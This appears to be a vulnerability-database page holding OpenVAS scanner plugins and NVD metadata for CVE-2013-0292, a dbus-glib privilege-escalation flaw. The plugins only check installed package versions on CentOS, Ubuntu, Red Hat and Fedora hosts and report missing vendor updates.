CentOS Update for dbus-glib CESA-2013:0568 centos5
2013-03-05T00:00:00
ID OPENVAS:1361412562310881618 Type openvas Reporter Copyright (c) 2013 Greenbone Networks GmbH Modified 2019-03-15T00:00:00
Description
The remote host is missing an update for the
###############################################################################
# OpenVAS Vulnerability Test
#
# CentOS Update for dbus-glib CESA-2013:0568 centos5
#
# Authors:
# System Generated Check
#
# Copyright:
# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License version 2
# (or any later version), as published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
###############################################################################
if(description)
{
script_xref(name:"URL", value:"http://lists.centos.org/pipermail/centos-announce/2013-March/019258.html");
script_oid("1.3.6.1.4.1.25623.1.0.881618");
script_version("$Revision: 14222 $");
script_tag(name:"last_modification", value:"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $");
script_tag(name:"creation_date", value:"2013-03-05 09:43:23 +0530 (Tue, 05 Mar 2013)");
script_cve_id("CVE-2013-0292");
script_tag(name:"cvss_base", value:"7.2");
script_tag(name:"cvss_base_vector", value:"AV:L/AC:L/Au:N/C:C/I:C/A:C");
script_xref(name:"CESA", value:"2013:0568");
script_name("CentOS Update for dbus-glib CESA-2013:0568 centos5");
script_tag(name:"summary", value:"The remote host is missing an update for the 'dbus-glib'
package(s) announced via the referenced advisory.");
script_category(ACT_GATHER_INFO);
script_copyright("Copyright (c) 2013 Greenbone Networks GmbH");
script_family("CentOS Local Security Checks");
script_dependencies("gather-package-list.nasl");
script_mandatory_keys("ssh/login/centos", "ssh/login/rpms", re:"ssh/login/release=CentOS5");
script_tag(name:"affected", value:"dbus-glib on CentOS 5");
script_tag(name:"solution", value:"Please install the updated packages.");
script_tag(name:"insight", value:"dbus-glib is an add-on library to integrate the standard D-Bus library with
the GLib main loop and threading model.
A flaw was found in the way dbus-glib filtered the message sender (message
source subject) when the signal was received. This
could trick a system service using dbus-glib (such as fprintd) into
believing a signal was sent from a privileged process, when it was not. A
local attacker could use this flaw to escalate their privileges.
(CVE-2013-0292)
All dbus-glib users are advised to upgrade to these updated packages, which
contain a backported patch to correct this issue. All running applications
linked against dbus-glib, such as fprintd and NetworkManager, must be
restarted for this update to take effect.");
script_tag(name:"qod_type", value:"package");
script_tag(name:"solution_type", value:"VendorFix");
exit(0);
}
include("revisions-lib.inc");
include("pkg-lib-rpm.inc");
release = rpm_get_ssh_release();
if(!release)
exit(0);
res = "";
if(release == "CentOS5")
{
if ((res = isrpmvuln(pkg:"dbus-glib", rpm:"dbus-glib~0.73~11.el5_9", rls:"CentOS5")) != NULL)
{
security_message(data:res);
exit(0);
}
if ((res = isrpmvuln(pkg:"dbus-glib-devel", rpm:"dbus-glib-devel~0.73~11.el5_9", rls:"CentOS5")) != NULL)
{
security_message(data:res);
exit(0);
}
if (__pkg_match) exit(99);
exit(0);
}
{"id": "OPENVAS:1361412562310881618", "type": "openvas", "bulletinFamily": "scanner", "title": "CentOS Update for dbus-glib CESA-2013:0568 centos5", "description": "The remote host is missing an update for the ", "published": "2013-03-05T00:00:00", "modified": "2019-03-15T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310881618", "reporter": "Copyright (c) 2013 Greenbone Networks GmbH", "references": ["http://lists.centos.org/pipermail/centos-announce/2013-March/019258.html", "2013:0568"], "cvelist": ["CVE-2013-0292"], "lastseen": "2019-05-29T18:38:19", "viewCount": 1, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-0568", "CVE-2013-0292"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310866781", "OPENVAS:1361412562310870941", "OPENVAS:1361412562310881631", "OPENVAS:1361412562310866061", "OPENVAS:866061", "OPENVAS:1361412562310123691", "OPENVAS:881631", "OPENVAS:841345", "OPENVAS:870941", "OPENVAS:866781"]}, {"type": "centos", "idList": ["CESA-2013:0568"]}, {"type": "zdt", "idList": ["1337DAY-ID-22315"]}, {"type": "oraclelinux", "idList": ["ELSA-2013-0568"]}, {"type": "freebsd", "idList": ["77BB0541-C1AA-11E3-A5AC-001B21614864"]}, {"type": "exploitdb", "idList": ["EDB-ID:33614"]}, {"type": "redhat", "idList": ["RHSA-2013:0568", "RHSA-2013:0636"]}, {"type": "ubuntu", "idList": ["USN-1753-1"]}, {"type": "nessus", "idList": ["MANDRIVA_MDVSA-2013-071.NASL", "CENTOS_RHSA-2013-0568.NASL", "FEDORA_2013-12156.NASL", "FREEBSD_PKG_77BB0541C1AA11E3A5AC001B21614864.NASL", "SL_20130226_DBUS_GLIB_ON_SL5_X.NASL", "ORACLELINUX_ELSA-2013-0568.NASL", "FEDORA_2013-12199.NASL", "REDHAT-RHSA-2013-0568.NASL", "ORACLEVM_OVMSA-2016-0057.NASL", "UBUNTU_USN-1753-1.NASL"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:12915", "SECURITYVULNS:DOC:29111"]}, {"type": "fedora", "idList": ["FEDORA:A0C4222260", "FEDORA:784EA21BA2"]}], "modified": "2019-05-29T18:38:19", "rev": 2}, "score": {"value": 6.1, "vector": "NONE", "modified": "2019-05-29T18:38:19", "rev": 2}, "vulnersScore": 6.1}, "pluginID": "1361412562310881618", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus-glib CESA-2013:0568 centos5\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.centos.org/pipermail/centos-announce/2013-March/019258.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.881618\");\n script_version(\"$Revision: 14222 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 13:50:48 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-05 09:43:23 +0530 (Tue, 05 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name:\"CESA\", value:\"2013:0568\");\n script_name(\"CentOS Update for dbus-glib CESA-2013:0568 centos5\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus-glib'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\", re:\"ssh/login/release=CentOS5\");\n script_tag(name:\"affected\", value:\"dbus-glib on CentOS 5\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n script_tag(name:\"insight\", value:\"dbus-glib is an add-on library to integrate the standard D-Bus library with\n the GLib main loop and threading model.\n\n A flaw was found in the way dbus-glib filtered the message sender (message\n source subject) when the signal was received. This\n could trick a system service using dbus-glib (such as fprintd) into\n believing a signal was sent from a privileged process, when it was not. A\n local attacker could use this flaw to escalate their privileges.\n (CVE-2013-0292)\n\n All dbus-glib users are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. All running applications\n linked against dbus-glib, such as fprintd and NetworkManager, must be\n restarted for this update to take effect.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"CentOS5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.73~11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.73~11.el5_9\", rls:\"CentOS5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "naslFamily": "CentOS Local Security Checks"}
{"cve": [{"lastseen": "2021-02-02T06:06:45", "description": "The dbus_g_proxy_manager_filter function in dbus-gproxy in Dbus-glib before 0.100.1 does not properly verify the sender of NameOwnerChanged signals, which allows local users to gain privileges via a spoofed signal.", "edition": 6, "cvss3": {}, "published": "2013-03-05T21:38:00", "title": "CVE-2013-0292", "type": "cve", "cwe": ["CWE-20"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2013-0292"], "modified": "2017-08-29T01:33:00", "cpe": ["cpe:/a:freedesktop:dbus-glib:0.88", "cpe:/a:freedesktop:dbus-glib:0.94", "cpe:/a:freedesktop:dbus-glib:0.84", "cpe:/a:freedesktop:dbus-glib:0.96", "cpe:/a:freedesktop:dbus-glib:0.100", "cpe:/a:freedesktop:dbus-glib:0.80", "cpe:/a:freedesktop:dbus-glib:0.73", "cpe:/a:freedesktop:dbus-glib:0.76", "cpe:/a:freedesktop:dbus-glib:0.82", "cpe:/a:freedesktop:dbus-glib:0.90", "cpe:/a:freedesktop:dbus-glib:0.78", "cpe:/a:freedesktop:dbus-glib:0.92", "cpe:/a:freedesktop:dbus-glib:0.98", "cpe:/a:freedesktop:dbus-glib:0.74", "cpe:/a:freedesktop:dbus-glib:0.86", "cpe:/a:freedesktop:dbus-glib:0.72"], "id": "CVE-2013-0292", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0292", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:freedesktop:dbus-glib:0.100:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.96:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.76:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.86:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.94:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.92:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.84:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.98:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.72:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.82:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.80:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.73:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.90:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.78:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.88:*:*:*:*:*:*:*", "cpe:2.3:a:freedesktop:dbus-glib:0.74:*:*:*:*:*:*:*"]}], "openvas": [{"lastseen": "2018-01-22T13:10:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Check for the Version of dbus-glib", "modified": "2018-01-22T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:841345", "href": "http://plugins.openvas.org/nasl.php?oid=841345", "type": "openvas", "title": "Ubuntu Update for dbus-glib USN-1753-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_1753_1.nasl 8483 2018-01-22 06:58:04Z teissa $\n#\n# Ubuntu Update for dbus-glib USN-1753-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"dbus-glib on Ubuntu 12.10 ,\n Ubuntu 12.04 LTS ,\n Ubuntu 11.10 ,\n Ubuntu 10.04 LTS\";\ntag_insight = \"Sebastian Krahmer and Bastien Nocera discovered that DBus-GLib did not\n properly validate the message sender when the "NameOwnerChanged" signal was\n received. A local attacker could possibly use this issue to escalate their\n privileges.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-1753-1/\");\n script_id(841345);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:21 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"USN\", value: \"1753-1\");\n script_name(\"Ubuntu Update for dbus-glib USN-1753-1\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus-glib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU12.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libdbus-glib-1-2\", ver:\"0.98-1ubuntu1.1\", rls:\"UBUNTU12.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU11.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libdbus-glib-1-2\", ver:\"0.94-4ubuntu0.1\", rls:\"UBUNTU11.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU10.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libdbus-glib-1-2\", ver:\"0.84-1ubuntu0.3\", rls:\"UBUNTU10.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU12.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libdbus-glib-1-2\", ver:\"0.100-1ubuntu0.1\", rls:\"UBUNTU12.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-23T13:09:53", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Check for the Version of dbus-glib", "modified": "2018-01-23T00:00:00", "published": "2013-03-12T00:00:00", "id": "OPENVAS:881631", "href": "http://plugins.openvas.org/nasl.php?oid=881631", "type": "openvas", "title": "CentOS Update for dbus-glib CESA-2013:0568 centos6 ", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# CentOS Update for dbus-glib CESA-2013:0568 centos6 \n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"dbus-glib is an add-on library to integrate the standard D-Bus library with\n the GLib main loop and threading model.\n\n A flaw was found in the way dbus-glib filtered the message sender (message\n source subject) when the "NameOwnerChanged" signal was received. This\n could trick a system service using dbus-glib (such as fprintd) into\n believing a signal was sent from a privileged process, when it was not. A\n local attacker could use this flaw to escalate their privileges.\n (CVE-2013-0292)\n \n All dbus-glib users are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. All running applications\n linked against dbus-glib, such as fprintd and NetworkManager, must be\n restarted for this update to take effect.\";\n\n\ntag_affected = \"dbus-glib on CentOS 6\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.centos.org/pipermail/centos-announce/2013-March/019617.html\");\n script_id(881631);\n script_version(\"$Revision: 8494 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-23 07:57:55 +0100 (Tue, 23 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-12 09:58:45 +0530 (Tue, 12 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"CESA\", value: \"2013:0568\");\n script_name(\"CentOS Update for dbus-glib CESA-2013:0568 centos6 \");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus-glib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"CentOS Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/centos\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"CentOS6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.86~6.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.86~6.el6\", rls:\"CentOS6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-01-22T13:09:37", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "Check for the Version of dbus-glib", "modified": "2018-01-22T00:00:00", "published": "2013-03-01T00:00:00", "id": "OPENVAS:870941", "href": "http://plugins.openvas.org/nasl.php?oid=870941", "type": "openvas", "title": "RedHat Update for dbus-glib RHSA-2013:0568-01", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# RedHat Update for dbus-glib RHSA-2013:0568-01\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"dbus-glib is an add-on library to integrate the standard D-Bus library with\n the GLib main loop and threading model.\n\n A flaw was found in the way dbus-glib filtered the message sender (message\n source subject) when the NameOwnerChanged signal was received. This\n could trick a system service using dbus-glib (such as fprintd) into\n believing a signal was sent from a privileged process, when it was not. A\n local attacker could use this flaw to escalate their privileges.\n (CVE-2013-0292)\n\n All dbus-glib users are advised to upgrade to these updated packages, which\n contain a backported patch to correct this issue. All running applications\n linked against dbus-glib, such as fprintd and NetworkManager, must be\n restarted for this update to take effect.\";\n\n\ntag_affected = \"dbus-glib on Red Hat Enterprise Linux (v. 5 server),\n Red Hat Enterprise Linux Desktop (v. 6),\n Red Hat Enterprise Linux Server (v. 6),\n Red Hat Enterprise Linux Workstation (v. 6)\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/rhsa-announce/2013-February/msg00075.html\");\n script_id(870941);\n script_version(\"$Revision: 8483 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-22 07:58:04 +0100 (Mon, 22 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2013-03-01 11:08:19 +0530 (Fri, 01 Mar 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"RHSA\", value: \"2013:0568-01\");\n script_name(\"RedHat Update for dbus-glib RHSA-2013:0568-01\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of dbus-glib\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Red Hat Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/rhel\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"RHENT_6\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-debuginfo\", rpm:\"dbus-glib-debuginfo~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.86~6.el6_4\", rls:\"RHENT_6\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"RHENT_5\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-debuginfo\", rpm:\"dbus-glib-debuginfo~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"dbus-glib-devel\", rpm:\"dbus-glib-devel~0.73~11.el5_9\", rls:\"RHENT_5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-07-16T00:00:00", "id": "OPENVAS:1361412562310866061", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866061", "type": "openvas", "title": "Fedora Update for dbus-glib FEDORA-2013-12156", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for dbus-glib FEDORA-2013-12156\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866061\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-16 10:14:36 +0530 (Tue, 16 Jul 2013)\");\n script_cve_id(\"CVE-2013-0292\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Fedora Update for dbus-glib FEDORA-2013-12156\");\n script_xref(name:\"FEDORA\", value:\"2013-12156\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/111404.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'dbus-glib'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC18\");\n script_tag(name:\"affected\", value:\"dbus-glib on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC18\")\n{\n\n if ((res = isrpmvuln(pkg:\"dbus-glib\", rpm:\"dbus-glib~0.100~3.fc18\", rls:\"FC18\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:38:22", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-0292"], "description": "The remote host is missing an update for the ", "modified": 